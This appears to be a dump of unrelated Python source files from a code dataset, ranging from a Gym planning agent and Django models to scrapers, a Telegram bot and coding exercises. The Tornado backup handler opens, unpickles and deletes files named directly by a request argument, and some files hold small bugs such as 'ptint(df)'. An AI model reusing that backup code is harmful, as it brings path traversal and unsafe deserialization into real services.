text stringlengths 8 6.05M |
|---|
import argparse
import sys
import os
sys.path.append(os.path.dirname(os.path.realpath(__file__)))
from __gym_iw import __GymIwAgent
import gym
from gym import wrappers, logger
class GymIwAgent(__GymIwAgent):
"""GYM-IW agent"""
def __init__(self,
environment,
planner,
encoding='byte',
space_relative_precision=0.001,
frameskip=1,
simulator_budget=150000,
time_budget=float('inf'),
novelty_subtables=False,
random_actions=False,
max_rep=30,
discount=1.0,
nodes_threshold=50000,
break_ties_using_rewards=False,
max_depth=1500,
debug_threshold=0,
random_seed=0,
logger_mode='info'):
'''Constructor of Gym IW agents
Parameters:
environment (gym.Env): Gym environment
planner (str): IW planner ('rollout-iw' or 'bfs-iw')
encoding (str): Gym space encoding to feature atoms ('byte' or 'variable')
space_relative_precision (float): relative precision of gym space variable-based encoding
frameskip (int): frame skip rate
simulator_budget (int): budget for #calls to simulator for online decision making
time_budget (float): time budget for online decision making
novelty_subtables (bool): use of single novelty table or novelty subtables
random_actions (bool): use of random action when there are no rewards in look-ahead tree
max_rep (int): max rep(etition) of features during lookahead
discount (float): discount factor for lookahead
nodes_threshold (int): threshold in #nodes for expanding look-ahead tree
break_ties_using_rewards (bool): break ties in favor of better rewards during bfs-iw
max_depth (int): max depth for lookahead
debug_threshold (int): threshold for debug mode
random_seed (int): random seed
logger_mode (str): logger mode ('debug' or 'info' or 'warning' or 'error' or 'stats' or 'silent')
'''
super().__init__(environment=environment, planner=planner, encoding=encoding, space_relative_precision=space_relative_precision,
frameskip=frameskip, simulator_budget=simulator_budget, time_budget=time_budget, novelty_subtables=novelty_subtables,
random_actions=random_actions, max_rep=max_rep, discount=discount, nodes_threshold=nodes_threshold,
break_ties_using_rewards=break_ties_using_rewards, max_depth=max_depth, debug_threshold=debug_threshold,
random_seed=random_seed, logger_mode=logger_mode)
def get_number_of_observation_feature_atoms(self):
'''Get the number of observation feature atoms generated by the chosen encoding mode (set in __init__)
Returns:
int: number of observation feature atoms
'''
return super().get_number_of_observation_feature_atoms()
def get_number_of_action_feature_atoms(self):
'''Get the number of action feature atoms generated by the chosen encoding mode (set in __init__)
Note: action feature atoms are not needed by the IW algorithms per se but it
helps generate a finite set of actions in case of continuous action
space (Gym specificity)
Returns:
int: number of action feature atoms
'''
return super().get_number_of_action_feature_atoms()
def play(self,
episodes=1,
initial_random_noops=1,
lookahead_caching=2,
prefix_length_to_execute=0.0,
execute_single_action=False,
max_execution_length_in_frames=18000):
'''Play a sequence of episodes
Parameters:
episodes (int): number of episodes
initial_random_noops (int): max number of initial noops, actual number is sampled (must be greater than 0)
lookahead_caching (int): lookahead caching (0=none, 1=partial, 2=full)
prefix_length_to_execute (float): % of prefix to execute (default is 0 = execute until positive reward)
execute_single_action (bool): execute only one action from best branch in lookahead (default is to execute prefix until first reward)
max_execution_length_in_frames (int): max number of frames in single execution
'''
super().play(episodes=episodes, initial_random_noops=initial_random_noops, lookahead_caching=lookahead_caching,
prefix_length_to_execute=prefix_length_to_execute, execute_single_action=execute_single_action,
max_execution_length_in_frames=max_execution_length_in_frames)
def start_episode(self, lookahead_caching=2):
'''Start an episode in interactive mode (MUST be called before calling several act() functions)
Parameters:
lookahead_caching (int): lookahead caching (0=none, 1=partial, 2=full)
'''
super().start_episode(lookahead_caching=lookahead_caching)
def act(self, observation, reward, done):
'''Select the (planned) action to execute
Parameters:
observation (Gym space observation element): current Gym observation
reward (float): last reward received from the Gym environment
done (bool): whether the Gym environment has reached a terminal state
'''
return super().act(observation=observation, reward=reward, done=done)
def end_episode(self):
'''End an episode in interactive mode (MUST be called after calling several act() functions)
'''
return super().end_episode()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=None)
parser.add_argument('env_id', nargs='?', default='CartPole-v0', help='Select the environment to run')
parser.add_argument('planner', nargs='?', default='bfs-iw', help='Select the planner to run (rollout-iw or bfs-iw)')
parser.add_argument('encoding', nargs='?', default='byte', help='Select the gym space encoding to feature atoms (byte or variable)')
parser.add_argument('space_relative_precision', nargs='?', default=0.001, help='Select the relative precision of gym space variable-based encoding')
args = parser.parse_args()
# You can set the level to logger.DEBUG or logger.WARN if you
# want to change the amount of output.
logger.set_level(logger.INFO)
env = gym.make(args.env_id)
# You provide the directory to write to (can be an existing
# directory, including one with existing data -- all monitor files
# will be namespaced). You can also dump to a tempdir if you'd
# like: tempfile.mkdtemp().
outdir = '/tmp/gym-iw-agent-results'
#env = wrappers.Monitor(env, directory=outdir, force=True)
env.seed(0)
agent = GymIwAgent(environment=env, planner=args.planner, encoding=args.encoding, space_relative_precision=args.space_relative_precision)
episode_count = 10
for i in range(episode_count):
reward = 0
done = False
ob = env.reset()
env.render()
env.close()
agent.start_episode()
while True:
action = agent.act(ob, reward, done)
ob, reward, done, _ = env.step(action)
env.render()
env.close()
if done:
break
# Note there's no env.render() here. But the environment still can open window and
# render if asked by env.monitor: it calls env.render('rgb_array') to record video.
# Video is not recorded every episode, see
# capped_cubic_video_schedule for details.
agent.end_episode()
# Close the env and write monitor result info to disk
env.close()
|
from calendar import day_name, weekday
month, day, year = map(int, input().split())
print(day_name[weekday(year, month, day)].upper())
|
# Generated by Django 2.0.2 on 2019-03-08 13:05
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('enterprice', '0002_enterprice_user'),
('delivery', '0004_delivery_user'),
]
operations = [
migrations.AddField(
model_name='delivery',
name='enterprice',
field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to='enterprice.EnterPrice', verbose_name='企业'),
preserve_default=False,
),
]
|
from django.test import TestCase
from zipcodes.models import ZipCode
class ZipCodeModelTest(TestCase):
def test_str_method_returns(self):
self.zip_code = ZipCode(zip_code='14020260')
self.assertEqual(self.zip_code.__str__(), '14020260')
|
from flask_oauthlib.client import OAuth
oauth = OAuth()
from flask.ext.assets import Environment
assets = Environment()
# Change this to HerokuConfig if using Heroku.
from flask.ext.appconfig import AppConfig
config = AppConfig()
|
# -*- coding:utf-8 -*-
# author: will
import logging
from flask import request, jsonify, g
from app import db, mongo_store
from app.models import Article
from celery_tasks.tasks import get_audio_baidu_test, get_audio_baidu
from utils.log_service import Logging
from utils.user_service.login import login_required, admin_required
from libs.xunfei import get_audio_xf
from . import api_article
# 文章转语音
@api_article.route('/get_audio', methods=['POST'])
@login_required
@admin_required
def get_audio():
try:
res = request.get_json()
article_id_list = res.get('article_id_list')
is_read = res.get('is_read') # 传入即修改语音状态
admin_id = g.user_id
Logging.logger.info('request_args:{0}'.format(res))
for article_id in article_id_list:
try:
article_id = int(article_id)
except Exception as e:
logging.error(e)
return jsonify(errno=-1, errmsg='传入文章ID错误')
obj = Article.query.get(article_id)
if not obj:
return jsonify(errno=-1, errmsg='该文章不存在')
# 修改语音状态
if is_read == 1:
obj.is_read = 0
obj.admin_id = admin_id
db.session.add(obj)
db.session.commit()
# return jsonify(errno=0, errmsg="取消音频成功")
else:
if obj.mp3_url:
# 已经生成过语音,被取消0状态
obj.is_read = 1
obj.admin_id = admin_id
db.session.add(obj)
db.session.commit()
# return jsonify(errno=0, errmsg="生成音频成功", mp3_url=obj.mp3_url)
else:
# 生成新语音
docs = mongo_store.articles.find({'title': obj.title})
doc = docs[0]
content = doc.get('content')
# get_audio_baidu_test.delay(article_id, content)
get_audio_baidu.delay(article_id, content)
obj.is_read = 1
obj.admin_id = admin_id
db.session.add(obj)
db.session.commit()
return jsonify(errno=0, errmsg="ok")
except Exception as e:
Logging.logger.error('errmsg:{0}'.format(e))
db.session.rollback()
return jsonify(errno=-1, errmsg='网络异常')
# 讯飞语音
@api_article.route('/get_audio_xunfei', methods=['POST'])
@login_required
@admin_required
def get_audio_xunfei():
try:
res = request.get_json()
data = res.get('data')
mp3_url = get_audio_xf(data)
if mp3_url is False:
return jsonify(errno=-1, errmsg='合成失败')
else:
return jsonify(errno=0, errmsg="OK", mp3_url=mp3_url)
except Exception as e:
print(e)
logging.error(e)
return jsonify(errno=-1, errmsg='网络异常')
|
import myLib
import matplotlib.pyplot as plt
import datetime
import time
import csv
import threading
import numpy as np
class Plotter:
controlTime = 0.0
currentAngle = 0.0
currentLoad = 0.0
numberOfActions = 0
def __init__(self, GVFinput):
self.gvf = GVFinput
#self.initPlotter()
def saveFigure(self, fileName='Figure_from_%s.png' % datetime.datetime.now()):
plt.savefig('figures/%s' % fileName)
def initPlotGVF(self):
plt.ion() # Turn interactive on
self.graphSpan = 100 # the width of the graph
self.maxY =25
self.minY = -10
x = np.arange(0, self.graphSpan)
# Init the fig
self.fig, (self.plot1Ax, self.plot2Ax) = plt.subplots(2)
#init the data to be plotted
self.angle = [0] * self.graphSpan
self.load = [0] * self.graphSpan
self.cumulant = [0] * self.graphSpan
self.prediction = [0] * self.graphSpan
# initial plot
(self.angleLine, self.loadLine, self.cumulantLine, self.predictionLine) = self.plot1Ax.plot(x, self.angle, 'b', x, self.load, 'y', x, self.cumulant, 'g', x, self.prediction, 'r', linewidth=3)
self.plot1Ax.axes.set_xlim(0, self.graphSpan)
self.plot1Ax.axes.set_ylim(self.minY, self.maxY)
self.angleLine.set_label('Angle')
self.loadLine.set_label('Load')
self.cumulantLine.set_label('Cumulant')
self.predictionLine.set_label('Prediction')
# Initialize the second graph ------------------------------================-----------------------
#init the data to be plotted
self.error = [0] * self.graphSpan
self.postReturn = [0] * self.graphSpan
self.postPrediction = [0] * self.graphSpan
# initial plot
(self.errorLine, self.postReturnLine, self.postPredictionLine) = self.plot2Ax.plot(x, self.error, 'y', x, self.postReturn, 'g', x, self.postPrediction, 'r', linewidth=3)
self.plot2Ax.axes.set_xlim(0, self.graphSpan)
self.plot2Ax.axes.set_ylim(self.minY, self.maxY)
self.errorLine.set_label("Error")
self.postReturnLine.set_label('Post-hoc Prediction')
self.postPredictionLine.set_label('Prediction')
self.plot1Ax.axes.legend(bbox_to_anchor=(0, 1), loc='upper left', ncol=1)
self.plot1Ax.axes.grid()
self.plot2Ax.axes.legend(bbox_to_anchor=(0, 1), loc='upper left', ncol=1)
self.plot2Ax.axes.grid()
self.controlTimeText = plt.text(0,self.minY - 5, "Time Control: " + str(0.0))
self.gvfTimeText = plt.text(75,self.minY - 5, "Time GVF: " + str(0.0))
self.elapsedTime = plt.text(56,self.minY - 5, "Elapsed Time: " + str(0.0))
self.errorText = plt.text(38,self.minY - 5, "Error: " + str(0.0))
self.avgErrorText = plt.text(18,self.minY - 5, "Avg Error: " + str(0.0))
self.numLearnText = plt.text(2,self.minY + 4 , "# Learn step: " + str(0.0))
self.numActionsText = plt.text(32,self.minY +4, "# Actions: " + str(0.0))
self.trueReturnText = plt.text(52,self.minY +4, "True Return: " + str(0.0)) #change to min +4 4
self.predictionText = plt.text(78,self.minY +4, "Prediction: " + str(0.0))
plt.pause(0.05)
def runPlotGVF(self):
# take measurements
currentAngle = self.currentAngle#self.s1.read_angle()#myLib.radToDeg(self.s1.read_angle())
currentCumulant = self.gvf.cumulant
currentPrediction = self.gvf.prediction
currentLoad = self.currentLoad
# add the newest to end of arrays
self.angle.append(currentAngle)
self.load.append(currentLoad)
self.cumulant.append(currentCumulant)
self.prediction.append(currentPrediction)
self.angleLine.set_ydata(self.angle[-self.graphSpan:])
self.loadLine.set_ydata(self.load[-self.graphSpan:])
self.cumulantLine.set_ydata(self.cumulant[-self.graphSpan:])
self.predictionLine.set_ydata(self.prediction[-self.graphSpan:])
#SECOND PLOT ---------======================-----------------------------------
# take measurements
currentPostPrediction = self.gvf.postPrediction
currentPostReturn = self.gvf.postReturn
currentError = abs(currentPostReturn - currentPostPrediction)
# add the newest to end of arrays
self.error.append(currentError)
self.postReturn.append(currentPostReturn)
self.postPrediction.append(currentPostPrediction)
self.errorLine.set_ydata(self.error[-self.graphSpan:])
self.postReturnLine.set_ydata(self.postReturn[-self.graphSpan:])
self.postPredictionLine.set_ydata(self.postPrediction[-self.graphSpan:])
self.controlTimeText.set_text("Time Control: " + str(self.controlTime))
self.gvfTimeText.set_text("Time GVF: " + str(self.gvf.timeDiff))
self.errorText.set_text("Error: " + str(round(currentError,4)))
self.avgErrorText.set_text("Avg Error: " + str(round(self.gvf.averageError,4)))
self.elapsedTime.set_text("Run Time: " + str(round((time.time() - self.startTimeRun), 3)))
self.numLearnText.set_text("# Learn Steps: " + str(self.gvf.numberOfLearningSteps))
self.numActionsText.set_text("# Actions: " + str(self.numberOfActions))
self.trueReturnText.set_text("True Return: " + str(self.gvf.postReturn))
self.predictionText.set_text("Prediction: " + str(self.gvf.postPrediction))
plt.pause(0.05)
def plotGVF(self, stoppingEvent):
self.startTimeRun = time.time()
self.initPlotGVF()
while not stoppingEvent.is_set():
self.runPlotGVF()
#time.sleep(.5)
self.saveFigure('GVF2__alpha_' + str(self.gvf.alpha) + '_tilings_' + str(self.gvf.numTilings) + '_gamma_' + str(self.gvf.gamma)+ '_lambda_' + str(self.gvf.lamb) + '.png')
def initPlotter(self):
self.startTimeRun = time.time()
self.initPlotGVF()
def plot(self):
self.runPlotGVF() |
import sys
import os
import numpy as np
import time
def load_data(path):
path_dir = path # CHANGE HERE!
file_list = os.listdir(path_dir)
file_list.sort()
return file_list
# files means 00001, 00002, ``````
if __name__ == "__main__":
print("Error.. Why loadData Module execute")
'''
###############concatenate method######################
array_1 = np.array([1,2,3,4,5,6,7,8,9,10,11,12])
prev = array_1[0:3]
for i in range(1,int(len(array_1)/4)):
prev = np.vstack([prev,array_1[4*i:4*i+3]])
print(prev)
''' |
import requests
from bs4 import BeautifulSoup
def weather_init_soup():
weather_url = 'https://search.naver.com/search.naver?sm=top_hty&fbm=1&ie=utf8&query=%EC%84%B1%EB%8F%99%EA%B5%AC+%EB%82%A0%EC%94%A8'
response = requests.get(weather_url)
soup = BeautifulSoup(response.text, 'html.parser')
return soup
def get_thermal(soup):
now_ther = soup.find('span', {'class', 'todaytemp'}).text
min_ther = soup.find('span', {'class', 'min'}).find('span', {'class', 'num'}).text
max_ther = soup.find('span', {'class', 'max'}).find('span', {'class', 'num'}).text
msg = f'현재 기온은 *{now_ther}*, 최저:{min_ther} 최고:{max_ther} ! '
return msg
def get_weather(soup):
now_weather = soup.find('span', {'class', 'ico_state2'}).text
if now_weather == '비':
msg = '지금은 비가온다구 *우산*을 챙겨달라구 :umbrella:'
else:
msg = f'지금은 {now_weather}이라구 :racoon_man:'
return msg
def hangang_temp():
response = requests.get(url='https://www.wpws.kr/hangang/')
soup = BeautifulSoup(response.text, 'html.parser')
print(soup)
get_hangang_data = soup.find('p', {'id': 'temp'}).text
msg = f'{get_hangang_data} 라구 :droplet:'
return msg
|
#!/usr/bin/python3
"""Reads a text file aun print"""
def read_file(filename=""):
"""Function read and print"""
with open(filename, encoding="utf-8") as f:
for line in f:
print(line, end="")
|
import logging
from telegram.ext import Updater, CommandHandler, MessageHandler, Filters
from telegram.error import TelegramError
# Enable logging
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
level=logging.INFO)
logger = logging.getLogger(__name__)
# Use your own API_TOKEN here
API_TOKEN = "TOKEN"
# Define a few command handlers. These usually take the two arguments update and
# context. Error handlers also receive the raised TelegramError object in error.
def start(update, context):
# Start monitoring messages and remove new user joined group message
update.message.reply_text("Hello, I am the Thread Cleaner")
def help(update, context):
"""Send a message when the command /help is issued."""
update.message.reply_text('This bot automatically removes all user joined messages in a group if made admin')
def error(update, context):
"""Log Errors caused by Updates."""
logger.warning('Update "%s" caused error "%s"', update, context.error)
def clean(update, context):
try:
context.bot.delete_message(update.message.chat.id, update.message.message_id)
except TelegramError:
pass
def main():
updater = Updater(token=API_TOKEN, use_context=True)
# Get the dispatcher to register handlers
dp = updater.dispatcher
# on different commands - answer in Telegram
dp.add_handler(CommandHandler("start", start))
dp.add_handler(CommandHandler("help", help))
# on noncommand i.e message - echo the message on Telegram
dp.add_handler(MessageHandler(Filters.status_update, clean))
# log all errors
dp.add_error_handler(error)
# Start the Bot
updater.start_polling()
# Run the bot until you press Ctrl-C or the process receives SIGINT,
# SIGTERM or SIGABRT. This should be used most of the time, since
# start_polling() is non-blocking and will stop the bot gracefully.
updater.idle()
if __name__ == '__main__':
main()
|
class AdmissionDetails(object):
def __init__(self):
self._AdmissionDegree = None
self._AdmissionType = None
self._AdmissionMonth = None
self._AdmissionYear = None
return
@property
def AdmissionDegree(self):
return self._AdmissionDegree
@AdmissionDegree.setter
def AdmissionDegree(self,admissionDegree):
if (type(admissionDegree) is not str):
raise ValueError('AdmissionDegree must be type String')
self._AdmissionDegree = str(admissionDegree)
@property
def AdmissionType(self):
return self._AdmissionType
@AdmissionType.setter
def AdmissionType(self,admissionType):
if (type(admissionType) is not str):
raise ValueError('AdmissionType must be type String')
self._AdmissionType = str(admissionType)
@property
def AdmissionMonth(self):
return self._AdmissionMonth
@AdmissionMonth.setter
def AdmissionMonth(self,admissionMonth):
if (type(admissionMonth) is not str):
raise ValueError('AdmissionMonth must be type String')
self._AdmissionMonth = str(admissionMonth)
@property
def AdmissionYear(self):
return self._AdmissionYear
@AdmissionYear.setter
def AdmissionYear(self,admissionYear):
if (type(admissionYear) is not str):
raise ValueError('AdmissionYear must be type String')
self._AdmissionYear = str(admissionYear)
|
import pandas as pd
df = pd.read_csv("hrdata.csv")
ptint(df) |
import unittest
from katas.kyu_7.ordering_the_words import order_word
class OrderingTheWordsTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(order_word('Hello, World!'), ' !,HWdellloor')
def test_equals_2(self):
self.assertEqual(order_word('bobby'), 'bbboy')
def test_equals_3(self):
self.assertEqual(order_word(''), 'Invalid String!')
def test_equals_4(self):
self.assertEqual(order_word('completesolution'), 'ceeillmnooopsttu')
def test_equals_5(self):
self.assertEqual(order_word('\"][@!#$*(^&%'), '!\"#$%&(*@[]^')
def test_equals_6(self):
self.assertEqual(
order_word('i\"d][@z!#$r(^a&world%'), '!\"#$%&(@[]^addilorrwz'
)
def test_equals_7(self):
self.assertEqual(order_word(None), 'Invalid String!')
|
from collections import Counter
with open('input.txt') as my_file:
input = my_file.readline()
def flatten(il):
return [item for list in il for item in list]
width, height = 25, 6
layers = int(len(input)/width/height)
all_layers = {k: [[int(input[k*width*height + j*width + i])
for i in range(width)]
for j in range(height)]
for k in range(layers)}
num_counts = {k: Counter(flatten(all_layers[k])) for k in all_layers.keys()}
min_zeros = min(num_counts[k][0] for k in num_counts.keys())
output_layer = dict(filter(lambda x: x[1][0] == min_zeros, num_counts.items()))
print([x[1] * x[2] for x in list(output_layer.values())][0])
|
# Author: Jack (z5129432) for COMP9021 Assignment 1
# Date: 23/08/2017
# Description:
'''
'''
import sys
# function: move
# input: null
# output: die[] after moved
def move_right():
die_copy = die[:]
die[3] = die_copy[2] # right become bottom
die[2] = die_copy[0] # top become right
die[0] = die_copy[5] # left become top
die[5] = die_copy[3] # bottom become left
return
def move_left():
die_copy = die[:]
die[0] = die_copy[2] # right become top
die[5] = die_copy[0] # top become left
die[3] = die_copy[5] # left become bottom
die[2] = die_copy[3] # bottom become right
return
def move_forewards():
die_copy = die[:]
die[1] = die_copy[0] # top become front
die[3] = die_copy[1] # front become bottom
die[4] = die_copy[3] # bottom become back
die[0] = die_copy[4] # back become top
return
def move_backwards():
die_copy = die[:]
die[4] = die_copy[0] # top become back
die[0] = die_copy[1] # front become top
die[1] = die_copy[3] # bottom become front
die[3] = die_copy[4] # back become bottom
return
# user interface: input part
while True:
try:
cell = int(input('Enter the desired goal cell number: '))
if cell <= 0:
raise ValueError
break
except ValueError:
print('Incorrect value, try again')
# initialize die[]
# top front right bottom back left
# 0 1 2 3 4 5
die = [3, 2, 1, 4, 5, 6]
# initialize moving step in one direction
step = 1
# initialize counter
i = cell
# simulate moving die
# function: move
# input: null
# output: die[] after moved
while(i > 1):
for _ in range(0, step): # moving right for "step" steps
move_right()
i -= 1
if i <= 1:
break
if i <= 1:
break
for _ in range(0, step): # moving forewards for "step" steps
move_forewards()
i -= 1
if i <= 1:
break
if i <= 1:
break
step += 1 # increase step by 1
for _ in range(0, step): # moving left for "step" steps
move_left()
i -= 1
if i <= 1:
break
if i <= 1:
break
for _ in range(0, step): # moving backwards for "step" steps
move_backwards()
i -= 1
if i <= 1:
break
step += 1 # increase step by 1
# user interface: output part
print(f'On cell {cell}, {die[0]} is at the top, {die[1]} at the front, and {die[2]} on the right.') |
def interpolation_search(arr, x):
low = 0
high = len(arr) - 1
while low <= high and x >= arr[low] and x <= arr[high]:
if low == high:
if arr[low] == x:
return low
return -1
pos = low + int(((float(high - low) / (arr[high] - arr[low])) * (x - arr[low])))
if arr[pos] == x:
return pos
if arr[pos] < x:
low = pos + 1
else:
high = pos - 1
return -1
if __name__ == '__main__':
arr = [12, 11, 13, 5, 6, 7]
x = 11
result = interpolation_search(arr, x)
if result != -1:
print("Element is present at index", str(result))
else:
print("Element is not present in array")
|
# coding=utf8
import const
from . import base
import model
import sqlalchemy
import tornado.web
import requests
import re, json, os, sys, datetime, pickle
import itertools
class FetchDataHelper(base.FetchHelper):
""" 抓取外部数据. """
def fetch_product(self, offer_id, data=None, raw=False):
""" 抓取product数据. """
data = data or self.fetch_offer_dict(offer_id)
print('%s fetch!' % offer_id)
product = dict(
offer_id = offer_id,
subject = data['subject'],
img_url = data['imageList'][0]['originalImageURI'],
code = data['productFeatureList'].get('货号'),
brand = data['productFeatureList'].get('品牌'),
pattern = data['productFeatureList'].get('图案'),
fabric = data['productFeatureList'].get('面料名称'),
fabric_content = data['productFeatureList'].get('主面料成分'),
fabric_scale = data['productFeatureList'].get('主面料成分的含量'),
)
return raw and product or model.ProductModel(**product)
def fetch_skus(self, offer_id=None, data=None, raw=False):
""" 抓取sku数据. """
data = data or self.fetch_offer_dict(offer_id)
skus = []
for sku in data['skuMap'] or []:
skus.append(dict(
color = sku.get('color'),
size = sku.get('size'),
book_count = sku.get('canBookCount'),
sale_count = sku.get('saleCount'),
price = sku.get('discountPrice', data.get('priceDisplay')),
))
return raw and skus or [model.SkuModel(**sku) for sku in skus]
class ProductHandler(base.BaseHelper):
def get(self, product_id):
product = self.db.query(model.ProductModel).filter_by(id=product_id).first()
product and self.render('ledia/product.html', product=product)
def post(self, product_id):
response = {'error': '', 'data': {}}
for product in self.db.query(model.ProductModel).filter_by(id=product_id):
for key in self.request.arguments:
value = self.get_argument(key)
setattr(product, key, value)
self.db.commit()
response['data'][key] = value
return self.write(response)
def delete(self, product_id):
for product in self.db.query(model.ProductModel).filter_by(id=product_id):
print(product)
self.db.delete(product)
self.db.commit()
os.remove(os.path.join('media/img/product/', product.offer_id, '.jpg'))
self.write({'error': '', 'data': product_id})
class ShopHandler(FetchDataHelper):
def initialize(self):
super().initialize()
self.today = datetime.date.today()
self.config = self.db.query(model.ConfigModel).first()
def add_product(self, offer_id, data=None, commit=False):
data = data or self.fetch_offer_dict(offer_id)
if not data['productFeatureList'].get('货号'): # 非商品不录入
print('%s not added!' %offer_id)
return None
product = self.fetch_product(offer_id, data=data)
product.update_date = self.today
product.skus = self.fetch_skus(data=data)
product.update_sku_relative()
product.update_last()
self.db.add(product)
self.save_img(self.thumb(product.img_url), offer_id)
if commit: self.db.commit()
print('%s added!' %offer_id)
return product
def update_product(self, product, data=None, commit=False, force=False):
if not force and not product.is_expiries(self.config.expiry_days): # 更新时间限制
print('%s not expired!' % product.offer_id)
return 0
data = data or self.fetch_offer_dict(product.offer_id)
if not data['productFeatureList'].get('货号') or not data['begin'] or data['begin']>self.config.normal_begin: # 回收站处理
product.status = '回收站'
if commit: self.db.commit()
print('%s droped!' % product.offer_id)
return -1
old_img_url = product.img_url
self.update_obj(product, self.fetch_product(product.offer_id, data=data, raw=True))
self.delete_objs(product.skus)
new_img_url = product.img_url
product.skus = self.fetch_skus(data=data)
product.update_sku_relative()
product.update_date = self.today
if new_img_url!=old_img_url: self.save_img(self.thumb(new_img_url), product.offer_id)
if product.status=='回收站':
product.status='上架'
if commit: self.db.commit()
print('%s added!' % product.offer_id)
return 2
if commit: self.db.commit()
print('%s updated!' % product.offer_id)
return 1
def init(self):
""" 初始化数据库. """
if self.db.query(model.ProductModel).count(): return self.write('请删除数据库后再试!') #只作首次运行
commit_count_temp = 0
for offer_id in self.fetch_offer_list():
self.add_product(offer_id)
commit_count_temp += 1
if commit_count_temp % 20 == 0: self.db.commit()
self.config.update_date = self.today
self.db.commit()
#self.write('Init')
self.redirect('/')
def update(self):
""" 抓取数据更新. """
force = self.get_argument('force', False)
if not force and not self.config.is_expiries():
return self.write('上次更新时间是 %s, %d天内只能更新一次.' % (self.config.update_date, self.config.expiry_days))
commit_count_temp = 0
new_products = []
drop_products = []
products_dict = dict(self.db.query(model.ProductModel.offer_id, model.ProductModel).all())
for offer_id in self.fetch_offer_list():
print('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>')
print(offer_id)
product = products_dict.get(offer_id)
if not product:
product = self.add_product(offer_id, commit=True)
if not product: continue
new_products.append(product)
else:
products_dict.pop(offer_id)
temp = self.update_product(product, force=force)
if temp==0:
continue
elif temp==-1:
drop_products.append(product)
elif temp==2:
new_products.append(product)
commit_count_temp += 1
if commit_count_temp % 20 == 0: self.db.commit()
for product in products_dict.values():
temp = self.update_product(product)
if temp==0:
continue
elif temp==-1:
drop_products.append(product)
elif temp==2:
new_products.append(product)
commit_count_temp += 1
if commit_count_temp % 20 == 0: self.db.commit()
self.config.update_date = self.today
self.db.commit()
print('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>')
print('Update done! %d found! %d droped!' % (len(new_products), len(drop_products)))
self.render('ledia/update.html', new_products=new_products, drop_products=drop_products)
def get(self, action):
getattr(self, action)()
class HomeHandler(base.BaseHelper):
def initialize(self):
super().initialize()
self.config = self.db.query(model.ConfigModel).first()
def get(self):
if not self.config:
return self.redirect('/config')
filter_certains = {}
for arg in ('category', 'sku_status', 'status'):
value = self.get_argument(arg, '全部')
if value!='全部': filter_certains[arg] = value
data = self.db.query(model.ProductModel).filter_by(**filter_certains)
keywords = self.get_argument('keywords', None)
query_columns = self.get_argument('query_columns', None)
query_columns_dict = dict(const.query_columns_dict)
if keywords and query_columns and query_columns in query_columns_dict:
columns = query_columns_dict.get(query_columns)
keywords = keywords.lower()
or_keywords = re.split(r' +', keywords)
if len(or_keywords)>1:
keywords = or_keywords
method = sqlalchemy.or_
else:
keywords = [item.replace('\\+', '+') for item in re.split(r'(?<!\\)\++', keywords)]
method = sqlalchemy.and_
data = data.filter(method(*[getattr(model.ProductModel, columns).like('%'+keyword+'%') for keyword in keywords]))
# 多列搜索, 个人暂不用
#keywords = re.split(r' +', keywords.lower())
#query_columns = self.get_argument('query_columns', '全文')
#query_columns_dict = dict(const.query_columns_list)
#if query_columns=='全文':
#query_columns = query_columns_dict.values()
#elif query_columns in query_columns_dict:
#query_columns = [query_columns_dict.get(query_columns)]
#else:
#query_columns = []
#data = self.multi_columns_query(data, model.ProductModel, query_columns, keywords)
sort_columns = self.get_argument('sort_columns', None)
sort_columns_dict = dict(const.sort_columns_dict)
if sort_columns and sort_columns in sort_columns_dict:
columns = sort_columns_dict.get(sort_columns)
desc = self.get_argument('desc', None)
columns_obj = getattr(model.ProductModel, columns)
data = data.order_by(columns_obj.desc() if desc else columns_obj)
else:
data = data.order_by(model.ProductModel.id.desc())
self.show_page('ledia/index.html', data, self.config.per_page)
class ConfigHandler(base.BaseHelper):
def get(self):
config = self.db.query(model.ConfigModel).first()
self.render('ledia/config.html', config=config or {})
def post(self):
config_id = self.get_argument('id', None)
config = self.db.query(model.ConfigModel).first() if config_id else model.ConfigModel()
for key in self.request.arguments:
if key!='id' and hasattr(config, key):
value = self.get_argument(key, None)
if key=='update_date' and value: value = datetime.datetime.strptime(value, '%Y-%m-%d').date()
setattr(config, key, value or None)
not config_id and self.db.add(config)
self.db.commit()
self.redirect('/config')
class BackupHandler(base.BaseHelper):
def get(self):
self.render('ledia/backup.html', backups=os.listdir('media/backup'))
def post(self):
print('create')
backup = self.get_argument('backup')
if backup not in ('configs', 'products'):
return self.write({'error': True})
target = datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d_%H%M%S%f-'+backup)
with open('media/backup/'+target+'.bak', 'wb') as f:
backup_model = {'configs': model.ConfigModel, 'products': model.ProductModel}.get(backup)
columns = ('category', 'status', 'remarks') if backup=='products' else None
backup_dict = {}
for row in self.db.query(backup_model):
backup_dict[row.id] = self.model2dict(row, columns, ['id'])
pickle.dump({backup: backup_dict}, f)
return self.write({'error': None, 'data': target})
return self.write({'error': True})
def put(self):
print('import')
target = self.get_argument('backup', None)
if not target: return self.write({'error': True})
with open('media/backup/'+target+'.bak', 'rb') as f:
backup_dicts = pickle.load(f)
backup_models= {'configs': model.ConfigModel, 'products': model.ProductModel}
for backup in backup_dicts:
backup_dict = backup_dicts.get(backup)
backup_model = backup_models.get(backup)
for row in self.db.query(backup_model):
for key, value in backup_dict.get(row.id, {}).items():
setattr(row, key, value)
self.db.commit()
self.write({'error': None})
def delete(self):
print('delete')
target = self.get_argument('backup', None)
target = target and 'media/backup/' + target +'.bak'
print(target)
if target and os.path.exists(target):
os.remove(target)
self.write({'error': None})
class TestHandler(base.BaseHelper):
def get(self):
print('********************************')
print('test')
self.write('test')
self.db.query(model.ConfigModel).first().update_date = datetime.date.today()
self.db.commit()
|
from django.contrib import admin
from django.urls import path, include
from django.conf.urls import url
from User.views import (UserExtendedListAPIView,
UserExtendedRetrieveAPIView,
UserExtendedUpdateAPIView,
UserExtendedDeleteAPIView,
UserExtendedCreateAPIView,
UserCreateAPIView,
UserLoginAPIView)
app_name = 'User'
urlpatterns = [
url(r'list/$', UserExtendedListAPIView.as_view(), name='list'),
url(r'detail/(?P<pk>\d+)$', UserExtendedRetrieveAPIView.as_view(), name='detail'),
